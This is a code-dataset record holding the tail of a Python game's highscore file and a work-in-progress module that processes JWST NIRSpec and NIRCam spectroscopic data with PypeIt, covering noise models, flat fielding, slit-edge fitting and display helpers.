self.screen.blit(line,lineRect)\n\n # testCode\n def testSave(self):\n score = 100\n for i in range(6):\n name = chr(ord('a') + i)\n score -= 10\n self.addScores(OneScore(name, score))\n\n # [90, 80, 70, 60, 50, 40]\n","sub_path":"Project15112/highscore.py","file_name":"highscore.py","file_ext":"py","file_size_in_byte":4260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"531641234","text":"\nimport numpy as np\nfrom astropy.io import fits\nfrom astropy.stats import sigma_clipped_stats\nfrom pypeit.display import display\nfrom pypeit.core import fitting\nfrom gwcs import wcstools\nfrom matplotlib import pyplot as plt\nfrom jwst import datamodels\nfrom pypeit.utils import inverse\nDO_NOT_USE = datamodels.dqflags.pixel['DO_NOT_USE']\nfrom pypeit import msgs\nfrom pypeit.core import flat\nfrom pypeit.core import procimg\nfrom astropy.io import fits\nfrom astropy.wcs import WCS\nimport grismconf\n\n\n\nfrom IPython import embed\n\ndef compute_diff(scifile, bkgfile1, bkgfile2):\n sci_rate = datamodels.open(scifile)\n bkg1_rate = datamodels.open(bkgfile1)\n bkg2_rate = datamodels.open(bkgfile2)\n\n sci = sci_rate.data\n diff = sci_rate.data - (bkg1_rate.data + bkg2_rate.data)/2.0\n\n return sci, diff\n\ndef get_cuts(image):\n mean, med, sigma = sigma_clipped_stats(image, sigma_lower=5.0, sigma_upper=5.0)\n cut_min = mean - 1.0 * sigma\n cut_max = mean + 4.0 * sigma\n return (cut_min, cut_max)\n\ndef fit_slit(thismask, left_or_right, polyorder=2, function='legendre', debug=False):\n\n slit_width = np.sum(thismask, axis=1)\n med_slit_width = np.median(slit_width[slit_width > 0])\n nspec, nspat = thismask.shape\n spec_vec = np.arange(nspec, dtype=float)\n spat_vec = np.arange(nspat, dtype=float)\n spat_img, spec_img = np.meshgrid(spat_vec, spec_vec)\n\n dummy_spat_img = spat_img.copy()\n bad_value = +np.inf if 'left' in left_or_right else -np.inf\n dummy_spat_img[np.logical_not(thismask)] = bad_value\n slit_mask = np.min(dummy_spat_img, axis=1) if 'left' in left_or_right else np.max(dummy_spat_img, axis=1)\n good_for_slit = (slit_width > 0.5 * med_slit_width) & (slit_mask != bad_value)\n bad_for_slit = 
np.logical_not(good_for_slit)\n\n pypeitFit = fitting.robust_fit(spec_vec[good_for_slit], slit_mask[good_for_slit], polyorder, function=function,\n maxiter=25, lower=3.0, upper=3.0, maxrej=1, sticky=True, verbose=False,\n minx=0.0, maxx=float(nspec - 1))\n slit = pypeitFit.eval(spec_vec)\n if debug:\n plt.plot(spec_vec[good_for_slit], slit_mask[good_for_slit], 'k.')\n plt.plot(spec_vec[bad_for_slit], slit_mask[bad_for_slit], 'r.')\n plt.plot(spec_vec, slit, 'b')\n plt.show()\n\n\n return slit\n\ndef jwst_nircam_proc(rate_file, configfile, RA, DEC, kludge_err=1.0, noise_floor=0.01, saturation=65000):\n\n\n # TODO Use the spat_img which PypeIt can take, but we are not using!!\n rate_obj, raw_sub, var_tot_sub, var_poisson_sub, var_rnoise_sub, dq_sub, waveimg_sub, spat_img_sub = jwst_nircam_subimgs(\n configfile, RA, DEC, rate_file)\n t_eff = rate_obj.meta.exposure.effective_exposure_time\n\n # Read in the output after msa_flagging. Extract the sub-images, rotate to PypeIt format.\n rate = raw_sub.T\n rate_var_tot = var_tot_sub.T\n rate_var_poisson = var_poisson_sub.T\n rate_var_rnoise = var_rnoise_sub.T\n # TODO Check that the errors don't have nonsense from the flat field error budget\n dq = dq_sub.T\n # Now perform the image processing\n raw_counts = rate * t_eff\n raw_var_poisson = kludge_err ** 2 * rate_var_poisson * t_eff ** 2\n raw_var_rnoise = kludge_err ** 2 * rate_var_rnoise * t_eff ** 2\n # Is this correct? I'm not sure I should be using their poisson variance for the noise floor\n raw_var = procimg.variance_model(raw_var_rnoise, counts=raw_var_poisson, noise_floor=noise_floor)\n # TODO This is a hack until I can understand how to get rid of the hot pixels in the JWST variance arrays using DQ flags.\n # I don't know what the value of this parameter currently set to 20 should be?? Look into this via a github issue.\n # raw_gpm = (raw_var_rnoise < 20.0*ronoise**2) & (raw_var_poisson < saturation)\n raw_gpm = (raw_var_rnoise < saturation) & (raw_var_poisson < saturation)\n # raw_var_poisson + raw_var_rnoise # TODO Leaving out problematic flat field term from pipeline\n\n # This is the conversion between final2d and e2d, i.e. final2d = jwst_scale*e2d\n # total_flat = flatfield*pathloss*barshadow\n # flux_to_counts = t_eff / photom_conversion # This converts s2d outputs of flux to counts.\n # jwst_scale = photom_conversion/flatfield/pathloss/barshadow\n\n # TODO Perform the flat field correction yourself so as to update the noise model. 
Setting this to unit\n total_flat = np.ones_like(rate)\n finitemask = np.isfinite(rate, dtype=bool) # This was from NIRSPEC and may not be necessary\n total_flat_square = np.square(total_flat)\n\n count_scale = inverse(total_flat) # This is the quantity that goes into PypeIt for var modeling\n science, flat_bpm = flat.flatfield(raw_counts, total_flat)\n var_poisson, _ = flat.flatfield(raw_var_poisson, total_flat_square)\n base_var, _ = flat.flatfield(raw_var_rnoise, total_flat_square)\n var, _ = flat.flatfield(raw_var, total_flat_square)\n sciivar = inverse(var)\n dq_gpm = np.logical_not(dq & DO_NOT_USE)\n gpm = finitemask & dq_gpm & np.logical_not(flat_bpm) & (sciivar > 0.0) & raw_gpm\n\n nanmask = np.logical_not(finitemask)\n count_scale[nanmask] = 0.0\n science[nanmask] = 0.0\n var_poisson[nanmask] = 0.0\n base_var[nanmask] = 0.0\n var[nanmask] = 0.0\n sciivar[nanmask] = 0.0\n\n # TODO This is kludge city!!\n waveimg = 1e4 * waveimg_sub.T\n wave_min, wave_max = np.min(waveimg), np.max(waveimg)\n tilts = (waveimg - wave_min) / (wave_max - wave_min)\n spat_img = spat_img_sub.T\n\n return rate_obj, science, sciivar, gpm, dq_gpm, base_var, count_scale, finitemask, tilts, waveimg, spat_img\n\ndef jwst_nircam_subimgs(configfile, RA, DEC, rate_file, senscorrect=False, h5name=False, yoffset=0., yhsize=20., use_wcs=False):\n\n\n hdu = fits.open(rate_file)\n wcs = WCS(hdu[1].header)\n\n # Information about observing mode of this rate file\n h = hdu[0].header\n filt = h[\"FILTER\"] # Filter name, e.g. F410M\n grism = h[\"PUPIL\"][-1] # R or C\n module = h[\"MODULE\"] # Which NIRCAM module, A or B\n\n C = grismconf.Config(configfile)\n\n # Compute the position of the source in the image in pixel coordinates\n grism_with_wcs = datamodels.open(rate_file)\n\n world_to_pix = grism_with_wcs.meta.wcs.get_transform('world', 'detector')\n x0, y0, foo, foo2 = world_to_pix(RA, DEC, 0, 0)\n print('Target is at ', x0, y0)\n\n y0 = y0 + yoffset\n xref = x0 # 2048.\n yref = y0 # 2048.\n\n t = C.INVDISPL('+1', xref, yref, np.array([2.99, 4.21]))\n dx = C.DISPX('+1', xref, yref, t)\n dy = C.DISPY('+1', xref, yref, t)\n x_line = x0 + dx\n y_line = y0 + dy\n minx0 = np.max([0, np.int32(np.min(x_line))])\n maxx0 = np.min([2047, np.int32(np.max(x_line))]) # where do these numbers come from??\n miny0 = np.max([0, np.int32(np.min(y_line - yhsize))])\n maxy0 = np.min([2047, np.int32(np.max(y_line + yhsize))])\n\n data = grism_with_wcs.data\n var_tot = grism_with_wcs.err ** 2\n var_poisson = grism_with_wcs.var_poisson\n var_rnoise = grism_with_wcs.var_rnoise\n dq = grism_with_wcs.dq\n #data = hdu[\"SCI\"].data\n #err = hdu[\"ERR\"].data\n #dq = hdu[\"DQ\"].data\n\n # We trim our data to be the stamp containing the spectrum we want to extract\n data = data[miny0:maxy0 + 1, minx0:maxx0 + 1]\n var_tot = var_tot[miny0:maxy0 + 1, minx0:maxx0 + 1]\n var_poisson = var_poisson[miny0:maxy0 + 1, minx0:maxx0 + 1]\n var_rnoise = var_rnoise[miny0:maxy0 + 1, minx0:maxx0 + 1]\n dq = dq[miny0:maxy0 + 1, minx0:maxx0 + 1]\n print(data.shape, var_tot.shape, dq.shape) # , model0.shape)\n\n # These are the coordinates of all the pixels in our 2D stamp, but in the full image (wrt calibration is known)\n ys, xs = np.indices((maxy0 - miny0 + 1, maxx0 - minx0 + 1))\n # xs and ys are now the relative dx and dy offsets from the position of our source. 
They are both 2D arrays of x and y coordinates.\n xs = xs + minx0 - x0\n ys = ys + miny0 - y0\n\n # Depending on whether the grism disperses in the x or y direction, we use the INVDISPX or INVDISPY functions\n # to compute the value for t for every pixel in our 2D stamps\n if grism == \"R\":\n ts = C.INVDISPX(\"+1\", x0, y0, xs)\n dys = C.DISPY(\"+1\", x0, y0, ts) + ys - 2 * C.DISPY(\"+1\", x0, y0, ts)\n\n if grism == \"C\":\n ts = C.INVDISPY(\"+1\", x0, y0, ys)\n dys = C.DISPX(\"+1\", x0, y0, ts) + xs\n\n # Now compute the wavelength of every pixel in our 2D stamp\n ws = C.DISPL(\"+1\", x0, y0, ts)\n\n # Now, depending on whether things are in the row or col, we transpose things so that we can look at them properly (i.e. row direction)\n if grism == \"C\":\n # m = np.transpose(model0) # The model counts in each pixel\n l = np.transpose(ws) # The wavelength of each pixel\n d = np.transpose(data) # The data counts in each pixel\n var_tot_out = np.transpose(var_tot) # The data error estimates in each pixel\n var_poisson_out = np.transpose(var_poisson) # The data error estimates in each pixel\n var_rnoise_out = np.transpose(var_rnoise) # The data error estimates in each pixel\n q = np.transpose(dq) # The data DQ in each pixel\n y = np.transpose(dys) # The cross-dispersion distance of each pixel from the trace\n\n if grism == \"R\":\n # m = model0\n l = ws\n d = data\n var_tot_out = var_tot\n var_poisson_out = var_poisson\n var_rnoise_out = var_rnoise\n q = dq\n y = dys\n\n # correct for the sensitivity function of the filter\n if senscorrect:\n lam = np.nanmean(l, axis=0)\n sens = 1E-18 * C.SENS[\"+1\"](lam) # always use the one for module A because Module B data has been rescaled???\n\n d = d / sens\n # variances scale as 1/sens**2; also use the (possibly transposed) *_out arrays\n var_tot_out = var_tot_out / sens**2\n var_poisson_out = var_poisson_out / sens**2\n var_rnoise_out = var_rnoise_out / sens**2\n\n # TODO change variable names to be informative. Annoying that we have to recast\n return grism_with_wcs, d.astype(float), var_tot_out.astype(float), var_poisson_out.astype(float), var_rnoise_out.astype(float), \\\n q.astype(bool), l.astype(float), y.astype(float) # , m\n\n\ndef jwst_get_slits(finitemask, polyorder=5, function='legendre', debug=False):\n\n slit_left = fit_slit(finitemask, 'left', polyorder=polyorder, function=function, debug=debug)\n slit_righ = fit_slit(finitemask, 'righ', polyorder=polyorder, function=function, debug=debug)\n return slit_left, slit_righ\n
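# Annotator note (my addition): a quick, hedged sanity check for jwst_get_slits()
# above. For a rectangular finite-pixel mask the fitted edges should recover the
# mask bounds at every spectral row:
#
#     mask = np.zeros((100, 50), dtype=bool)
#     mask[:, 10:40] = True
#     slit_left, slit_righ = jwst_get_slits(mask)   # ~10 and ~39 everywhere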
\n\ndef jwst_proc(msa_data, t_eff, slit_slice, finitemask, pathloss, barshadow,\n kludge_err=1.0, ronoise=5.17, saturation=65000, noise_floor=0.01):\n\n\n #slit_slice, slit_left, slit_righ, slit_left_orig, slit_righ_orig, spec_vals_orig, src_trace_ra, src_trace_dec, dq, \\\n #ra, dec, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, final = jwst_extract_subimgs(\n # final_slit, intflat_slit)\n\n # Now deal with the image processing\n #if not np.any(finitemask):\n # return (None,)*21\n\n # Read in the output after msa_flagging. Extract the sub-images, rotate to PypeIt format.\n rate = np.array(msa_data.data.T[slit_slice], dtype=float)\n rate_var_rnoise = np.array(msa_data.var_rnoise.T[slit_slice], dtype=float)\n rate_var_poisson = np.array(msa_data.var_poisson.T[slit_slice], dtype=float)\n # This is currently buggy as it includes flat field error\n # rate_var_tot = np.square(np.array(e2d_slit.err.T, dtype=float))\n dq = np.array(msa_data.dq.T[slit_slice], dtype=int)\n\n # Now perform the image processing\n raw_counts = rate*t_eff\n raw_var_poisson = kludge_err**2*rate_var_poisson*t_eff**2\n raw_var_rnoise = kludge_err**2*rate_var_rnoise*t_eff**2\n # Is this correct? I'm not sure I should be using their poisson variance for the noise floor\n raw_var = procimg.variance_model(raw_var_rnoise, counts = raw_var_poisson, noise_floor=noise_floor)\n # TODO This is a hack until I can understand how to get rid of the hot pixels in the JWST variance arrays using DQ flags.\n # I don't know what the value of this parameter currently set to 20 should be?? Look into this via a github issue.\n #raw_gpm = (raw_var_rnoise < 20.0*ronoise**2) & (raw_var_poisson < saturation)\n raw_gpm = (raw_var_rnoise < saturation) & (raw_var_poisson < saturation)\n #raw_var_poisson + raw_var_rnoise # TODO Leaving out problematic flat field term from pipeline\n\n # This is the conversion between final2d and e2d, i.e. final2d = jwst_scale*e2d\n # total_flat = flatfield*pathloss*barshadow\n #flux_to_counts = t_eff / photom_conversion # This converts s2d outputs of flux to counts.\n #jwst_scale = photom_conversion/flatfield/pathloss/barshadow\n total_flat = pathloss*barshadow\n total_flat_square = np.square(total_flat)\n\n count_scale = inverse(total_flat) # This is the quantity that goes into PypeIt for var modeling\n science, flat_bpm = flat.flatfield(raw_counts, total_flat)\n var_poisson, _ = flat.flatfield(raw_var_poisson, total_flat_square)\n base_var, _ = flat.flatfield(raw_var_rnoise, total_flat_square)\n var, _ = flat.flatfield(raw_var, total_flat_square)\n sciivar = inverse(var)\n dq_gpm = np.logical_not(dq & DO_NOT_USE)\n gpm = finitemask & dq_gpm & np.logical_not(flat_bpm) & (sciivar > 0.0) & raw_gpm\n\n nanmask = np.logical_not(finitemask)\n count_scale[nanmask] = 0.0\n science[nanmask] = 0.0\n var_poisson[nanmask] = 0.0\n base_var[nanmask] = 0.0\n var[nanmask] = 0.0\n sciivar[nanmask] = 0.0\n\n\n return science, sciivar, gpm, base_var, count_scale\n\ndef jwst_extract_subimgs(final_slit, intflat_slit):\n\n # The various multiplicative calibrations we need.\n slit_name = final_slit.name\n waveimg = np.array(final_slit.wavelength.T, dtype=float)\n slit_wcs = final_slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n ra = calra.T\n dec = caldec.T\n\n # get the source RA and Dec coordinates from the metadata (also located in the header of the fits SCI extension)\n nspec, nspat = ra.shape\n src_ra, src_dec = final_slit.meta.target.ra, final_slit.meta.target.dec\n\n cal_spat = np.arange(nspat) # spatial position\n src_trace_ra = np.zeros(nspec) # Array to hold the source_RA as a function of spectral position\n src_trace_dec = np.zeros(nspec) # Array to hold the source_DEC as a function of spectral position\n for ispec in range(nspec):\n ra_vs_spat = calra[:, ispec] #\n # Interpolate y-pixel as a function of RA onto the source RA\n src_trace_ra[ispec] = np.interp(src_ra, ra_vs_spat[np.isfinite(ra_vs_spat)],\n cal_spat[np.isfinite(ra_vs_spat)])\n dec_vs_spat = caldec[:, 
ispec]\n src_trace_dec[ispec] = np.interp(src_dec, dec_vs_spat[np.isfinite(dec_vs_spat)], cal_spat[np.isfinite(dec_vs_spat)])\n\n\n waveimg_from_wcs = calwave.T\n # Sometimes this fails at the 1e-4 level and disagrees about nans???\n #assert np.allclose(waveimg, waveimg_from_wcs, rtol=1e-3, atol=1e-3, equal_nan=True)\n\n\n flatfield = np.array(intflat_slit.data.T, dtype=float) #if intflat_slit is not None else np.ones_like(pathloss)\n pathloss = np.array(final_slit.pathloss_uniform.T, dtype=float) if final_slit.source_type == 'EXTENDED' else \\\n np.array(final_slit.pathloss_point.T, dtype=float)\n if pathloss.shape == (0,0):\n msgs.warn('No pathloss for slit {0}'.format(slit_name) + ', setting to 1.0')\n pathloss = np.ones_like(flatfield)\n\n barshadow = np.array(final_slit.barshadow.T, dtype=float)\n if barshadow.shape == (0,0):\n msgs.warn('No barshadow for slit {0}'.format(slit_name) + ', setting to 1.0')\n barshadow = np.ones_like(flatfield)\n\n photom_conversion = final_slit.meta.photometry.conversion_megajanskys\n final = np.array(final_slit.data.T, dtype=float)\n\n\n # Generate some tilts and a spatial image\n finitemask = np.isfinite(waveimg)\n # Get slit boundaries\n slit_left, slit_righ = jwst_get_slits(finitemask)\n\n waveimg = 1e4*waveimg\n waveimg[np.logical_not(finitemask)] = 0.0\n wave_min, wave_max = np.min(waveimg[finitemask]), np.max(waveimg[finitemask])\n\n tilts = np.zeros_like(waveimg)\n tilts[finitemask] = (waveimg[finitemask] - wave_min) / (wave_max - wave_min)\n\n # TODO Fix this spat_pix to make it increasing with pixel. For now don't use it\n # This currently depends on position angle which I need to hack to fix\n # ra_min, ra_max = np.min(ra_sub[finitemask_sub]), np.max(ra_sub[finitemask_sub])\n # spat_pix_sub = np.zeros_like(ra_sub)\n # spat_pix_sub[finitemask_sub] = spat_lo + (ra[finitemask_sub] - ra_min) / (ra_max - ra_min) * (nspat_sub - 1)\n\n\n\n ########################\n # The image segment being used for each slit\n spec_lo = final_slit.xstart - 1\n spec_hi = spec_lo + final_slit.xsize\n spat_lo = final_slit.ystart - 1\n spat_hi = spat_lo + final_slit.ysize\n # slice object for the segment\n slit_slice = np.s_[spec_lo: spec_hi, spat_lo: spat_hi]\n\n #embed()\n #rate = np.array(e2d_slit.data.T, dtype=float)\n #rate_var_rnoise = np.array(e2d_slit.var_rnoise.T, dtype=float)\n #rate_var_poisson = np.array(e2d_slit.var_poisson.T, dtype=float)\n # This is currently buggy as it includes flat field error\n #rate_var_tot = np.square(np.array(e2d_slit.err.T, dtype=float))\n dq = np.array(final_slit.dq.T, dtype=int)\n\n slit_left_orig = spat_lo + slit_left\n slit_righ_orig = spat_lo + slit_righ\n spec_vals_orig = spec_lo + np.arange(spec_hi - spec_lo)\n\n\n return slit_slice, slit_left, slit_righ, slit_left_orig, slit_righ_orig, spec_vals_orig, src_trace_ra, src_trace_dec, dq, \\\n ra, dec, finitemask, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, final\n\n\ndef jwst_show_msa(sci_rate, final2d, clear=True):\n\n sci_data = sci_rate.data.T\n viewer_sci, ch_sci = display.show_image(sci_data, cuts=get_cuts(sci_data), chname='raw rate', clear=clear)\n\n for islit, slit in enumerate(final2d.slits):\n # Read in data and print out slit name\n slit_name = final2d.slits[islit].name\n calsci = np.array(final2d.slits[islit].data, dtype=float) # contains the pixel data from the cal file (SCI extension)\n print('Slit={:s}'.format(slit_name))\n nspat, nspec = calsci.shape\n\n ########################\n # Plot the image segment being used for each slit\n xlo = 
final2d.slits[islit].xstart - 1\n xhi = xlo + final2d.slits[islit].xsize\n ylo = final2d.slits[islit].ystart - 1\n yhi = ylo + final2d.slits[islit].ysize\n # This is the segment of the 2d image\n slit_slice = np.s_[ylo: yhi, xlo: xhi]\n # xvals = xlo + np.arange(xhi - xlo)\n # yvals = ylo + np.arange(yhi - ylo)\n slit_left = np.full(nspec, ylo)\n slit_righ = np.full(nspec, yhi)\n spec_val = xlo + np.arange(xhi - xlo)\n display.show_slits(viewer_sci, ch_sci, slit_left, slit_righ, spec_vals=spec_val, pstep=1,\n slit_ids=np.array([int(slit_name)]))\n\n\ndef jwst_show_spec2(slit, intflat_slit=None, clear=True, emb=False):\n\n\n # Read in data print out slit name\n slit_name = slit.name\n print('Slit={:s}'.format(slit_name))\n calsci = np.array(slit.data, dtype=float) # contains the pixel data from the cal file (SCI extension)\n nspat, nspec = calsci.shape\n\n\n ########################\n # Plot the image segment being used for each slit\n #xlo = final2d.slits[islit].xstart - 1\n #xhi = xlo + final2d.slits[islit].xsize\n #ylo = final2d.slits[islit].ystart - 1\n #yhi = ylo + final2d.slits[islit].ysize\n # This is the segment of the 2d image\n #slit_slice = np.s_[ylo: yhi, xlo: xhi]\n # xvals = xlo + np.arange(xhi - xlo)\n # yvals = ylo + np.arange(yhi - ylo)\n #slit_left = np.full(nspec, ylo)\n #slit_righ = np.full(nspec, yhi)\n #spec_val = xlo + np.arange(xhi - xlo)\n #viewer_sci, ch_sci = display.show_image(rawscience.T, cuts=get_cuts(rawscience), chname='raw', clear=clear)\n #display.show_slits(viewer_sci, ch_sci, slit_left, slit_righ, spec_vals=spec_val, pstep=1,\n # slit_ids=np.array([int(slit_name)]))\n\n # get the source RA and Dec coordinates from the metadata (also located in the header of the fits SCI extension)\n source_ra = slit.meta.target.ra\n source_dec = slit.meta.target.dec\n print('catalog RA,DEC:', source_ra, source_dec)\n # determine the wavelength scale of the cal data for plotting purposes\n # get the data model WCS object. 
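    # --- Illustrative aside (hypothetical helper, defined but never called) ---
    # The per-column loop further below inverts the RA/Dec-vs-spatial-pixel relation
    # onto the catalog coordinate with a NaN-filtered np.interp. A minimal sketch of
    # that pattern; `sky_map` and `sky_target` are stand-in names, not pipeline
    # products, and numpy is assumed imported as np, as elsewhere in this module.
    def _demo_source_trace(sky_map, sky_target):
        # sky_map: (nspat, nspec) image of RA (or Dec); sky_target: catalog value
        nspat_d, nspec_d = sky_map.shape
        spat_d = np.arange(nspat_d)
        trace = np.full(nspec_d, np.nan)
        for icol in range(nspec_d):
            col = sky_map[:, icol]
            good = np.isfinite(col)
            if good.sum() >= 2:
                # np.interp needs an increasing abscissa, so sort defensively
                srt = np.argsort(col[good])
                trace[icol] = np.interp(sky_target, col[good][srt], spat_d[good][srt])
        return trace
    # --- end aside; the WCS evaluation for this slit continues below ---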
This example is from the fixed slit notebook\n slit_wcs = slit.meta.wcs\n x, y = wcstools.grid_from_bounding_box(slit_wcs.bounding_box, step=(1, 1))\n calra, caldec, calwave = slit_wcs(x, y)\n\n ## Old way from fixed slit notebook\n #y1, x1 = np.mgrid[:nspat,:nspec] # grid of pixel x,y indices\n #det2sky = slit_wcs.get_transform('detector','world') # the coordinate transform from detector space (pixels) to sky (RA, DEC in degrees)\n #calra, caldec, calwave = det2sky(x1, y1) # RA, Dec, wavelength (microns) for each pixel\n cal_spec = np.arange(nspec) # spectral position\n cal_spat = np.arange(nspat) # spatial position\n cal_src_from_ra_spat = np.zeros(nspec) # Array to hold the source_RA as a function of spectral position\n cal_src_from_dec_spat = np.zeros(nspec) # Array to hold the source_DEC as a function of spectral position\n for ispec in range(nspec):\n ra_vs_spat = calra[:, ispec] #\n # Interpolate y-pixel as a functio of RA onto the source RA\n cal_src_from_ra_spat[ispec] = np.interp(source_ra, ra_vs_spat[np.isfinite(ra_vs_spat)], cal_spat[np.isfinite(ra_vs_spat)])\n dec_vs_spat = caldec[:, ispec]\n cal_src_from_dec_spat[ispec] = np.interp(source_dec, dec_vs_spat[np.isfinite(dec_vs_spat)], cal_spat[np.isfinite(dec_vs_spat)])\n\n # Now transpose everything to PypeIt convention for viewing.\n\n # plot the unrectified calibrated 2D spectrum\n waveimg = calwave.T if (slit.wavelength.shape == (0,0)) else np.array(slit.wavelength.T,dtype=float)\n pathloss = np.array(slit.pathloss_uniform.T,dtype=float) if slit.source_type == 'EXTENDED' else \\\n np.array(slit.pathloss_point.T,dtype=float)\n barshadow = np.array(slit.barshadow.T,dtype=float)\n viewer_data, ch_data = display.show_image(calsci.T, waveimg = waveimg, cuts = get_cuts(calsci.T),\n chname=slit_name + '_data', clear=clear)\n viewer_wave, ch_wave = display.show_image(waveimg, waveimg=waveimg, chname=slit_name + '_wave')\n viewer_ra, ch_ra = display.show_image(calra.T, waveimg=waveimg, chname=slit_name + '_RA')\n if intflat_slit is not None:\n flat = np.array(intflat_slit.data.T,dtype=float)\n viewer_flat, ch_flat = display.show_image(flat, waveimg=waveimg, chname=slit_name + '_flat')\n display.show_trace(viewer_data, ch_data, cal_src_from_ra_spat, trc_name='RA', pstep=1, color='#f0e442')\n display.show_trace(viewer_data, ch_data, cal_src_from_dec_spat, trc_name='DEC', pstep=1, color='#f0e442')\n if pathloss.shape != (0,0):\n viewer_path, ch_path = display.show_image(pathloss, waveimg=waveimg, chname=slit_name + '_pathloss')\n if barshadow.shape != (0,0):\n viewer_bar, ch_bar = display.show_image(barshadow, waveimg=waveimg, chname=slit_name + '_barshadow')\n\n if emb:\n embed(header='Slit={:s}'.format(slit_name))\n\n\n\n# TODO Deprecated. This won't work now that I realize slits can overlap. 
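# --- Illustrative aside on the overlap bookkeeping used below ---
# jwst_populate_calibs pastes per-slit cutouts into full-frame images and counts
# how many slits claim each pixel; any pixel with count > 1 makes a single mosaic
# ambiguous, which is why the function is deprecated. A self-contained sketch of
# the accumulation pattern (hypothetical names; numpy assumed imported as np):
def _demo_accumulate(full_shape, cutouts):
    """cutouts: iterable of (slice_2d, subimg) pairs; returns mosaic and overlap count."""
    mosaic = np.zeros(full_shape)
    count = np.zeros(full_shape, dtype=int)
    for slice_2d, subimg in cutouts:
        good = np.isfinite(subimg)
        # basic slicing returns a view, so these writes go through to the full frame
        mosaic[slice_2d][good] = subimg[good]
        count[slice_2d][good] += 1
    return mosaic, count
# --- end aside ---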
So just use it as a visualization tool or something??\ndef jwst_populate_calibs(nspec, nspat, e2d_multi, final_multi, intflat_multi):\n\n ra = np.zeros((nspec, nspat))\n dec = np.zeros((nspec, nspat))\n waveimg = np.zeros((nspec, nspat))\n tilts = np.zeros((nspec, nspat))\n # The product of these three are the total flat so we instantiate all to 1.0\n flatfield = np.ones((nspec, nspat))\n pathloss = np.ones((nspec, nspat))\n barshadow = np.ones((nspec, nspat))\n photom_conversion = np.zeros((nspec, nspat)) # Currently a constant, but build the possiibility to have it be an image\n calwebb_final = np.zeros((nspec, nspat))\n subimg_count = np.zeros((nspec, nspat), dtype=int)\n slit_name_mask = np.zeros((nspec, nspat), dtype=int)\n\n # slit boundary stuff\n nslits = len(final_multi.slits)\n slit_left = np.zeros((nspec, nslits))\n slit_righ = np.zeros((nspec, nslits))\n spec_min = np.zeros(nslits)\n spec_max = np.zeros(nslits)\n\n # TODO print out a warning message here about the slits that are bad, i.e. nan everwhere\n reduce_gpm = np.ones(nslits, dtype=bool)\n meta_list = []\n\n for islit in range(nslits):\n # Read in data print out slit name\n slit_name = final_multi.slits[islit].name\n meta_list.append(final_multi.slits[islit].meta)\n\n slit_left_sub, slit_right_sub, rate_sub, rate_var_rnoise_sub, rate_var_poisson_sub, rate_var_tot_sub, \\\n ra_sub, dec_sub, waveimg_sub, tilts_sub, flatfield_sub, pathloss_sub, barshadow_sub, photom_conversion_sub, \\\n final_sub = jwst_extract_subimgs(e2d_multi.slits[islit], final_multi.slits[islit], intflat_multi.slits[islit])\n\n # Determine the slit boundaries using the waveimg\n finitemask_sub = np.isfinite(waveimg_sub)\n if not np.any(finitemask_sub):\n reduce_gpm[islit] = False\n msgs.warn('All nan wavelengths for Slit={:s}. Not extracting calibrations'.format(slit_name))\n else:\n #msgs.info('Extracting calibrations for Slit={:s}'.format(slit_name))\n\n ########################\n # The image segment being used for each slit\n spec_lo = final_multi.slits[islit].xstart - 1\n spec_hi = spec_lo + final_multi.slits[islit].xsize\n spat_lo = final_multi.slits[islit].ystart - 1\n spat_hi = spat_lo + final_multi.slits[islit].ysize\n # slice object for the segment\n slit_slice = np.s_[spec_lo: spec_hi, spat_lo: spat_hi]\n\n # Get slit bounadries\n nspec_sub, nspat_sub = ra_sub.shape\n sub_slit_left, sub_slit_righ = jwst_get_slits(finitemask_sub)\n\n\n\n # TODO Fix this spat_pix to make it increasing with pixel. 
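            # --- Illustrative aside on the spat_pix TODO above (hypothetical, inert) ---
            # One possible fix, sketched with stand-in names: flip the sign of the sky
            # coordinate when its median gradient along the spatial axis is negative,
            # so the derived coordinate always increases with pixel.
            def _demo_monotonic_spat(ra_demo, finite_demo):
                coord = np.where(finite_demo, ra_demo, np.nan)
                grad = np.nanmedian(np.diff(coord, axis=0))
                if np.isfinite(grad) and grad < 0:
                    coord = -coord  # flip so the coordinate increases with pixel
                cmin, cmax = np.nanmin(coord), np.nanmax(coord)
                if not (cmax > cmin):
                    return np.zeros_like(coord)
                # NaN pixels stay NaN; finite pixels map onto 0..nspat-1
                return (coord - cmin) / (cmax - cmin) * (coord.shape[0] - 1)
            # --- end aside; the TODO above still stands ---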
For now don't use it\n            # This currently depends on position angle, which I need to hack to fix\n            #ra_min, ra_max = np.min(ra_sub[finitemask_sub]), np.max(ra_sub[finitemask_sub])\n            #spat_pix_sub = np.zeros_like(ra_sub)\n            #spat_pix_sub[finitemask_sub] = spat_lo + (ra[finitemask_sub] - ra_min) / (ra_max - ra_min) * (nspat_sub - 1)\n\n            slit_left[spec_lo: spec_hi, islit] = spat_lo + sub_slit_left\n            slit_righ[spec_lo: spec_hi, islit] = spat_lo + sub_slit_righ\n            # This is a hack for now until we figure out how to deal with spec_min and spec_max slits.\n            # I'm just setting the boundaries everywhere outside the sub-image to the last defined boundary location\n            slit_left[:spec_lo, islit] = spat_lo + sub_slit_left[0]\n            slit_left[spec_hi:, islit] = spat_lo + sub_slit_left[-1]\n            slit_righ[:spec_lo, islit] = spat_lo + sub_slit_righ[0]\n            slit_righ[spec_hi:, islit] = spat_lo + sub_slit_righ[-1]\n\n            spec_min[islit] = spec_lo\n            spec_max[islit] = spec_hi\n\n            # Populate the 2d images in the regions where the JWST calibrations are finite\n            ra[slit_slice][finitemask_sub] = ra_sub[finitemask_sub]\n            dec[slit_slice][finitemask_sub] = dec_sub[finitemask_sub]\n            waveimg[slit_slice][finitemask_sub] = waveimg_sub[finitemask_sub]\n            tilts[slit_slice][finitemask_sub] = tilts_sub[finitemask_sub]\n            flatfield[slit_slice][finitemask_sub] = flatfield_sub[finitemask_sub]\n            pathloss[slit_slice][finitemask_sub] = pathloss_sub[finitemask_sub]\n            barshadow[slit_slice][finitemask_sub] = barshadow_sub[finitemask_sub]\n            photom_conversion[slit_slice][finitemask_sub] = photom_conversion_sub # Currently just a float but may be an image in the future\n            calwebb_final[slit_slice][finitemask_sub] = final_sub[finitemask_sub]\n            subimg_count[slit_slice][finitemask_sub] += 1\n\n    return reduce_gpm, ra, dec, waveimg, tilts, flatfield, pathloss, barshadow, photom_conversion, calwebb_final, subimg_count, \\\n        slit_left, 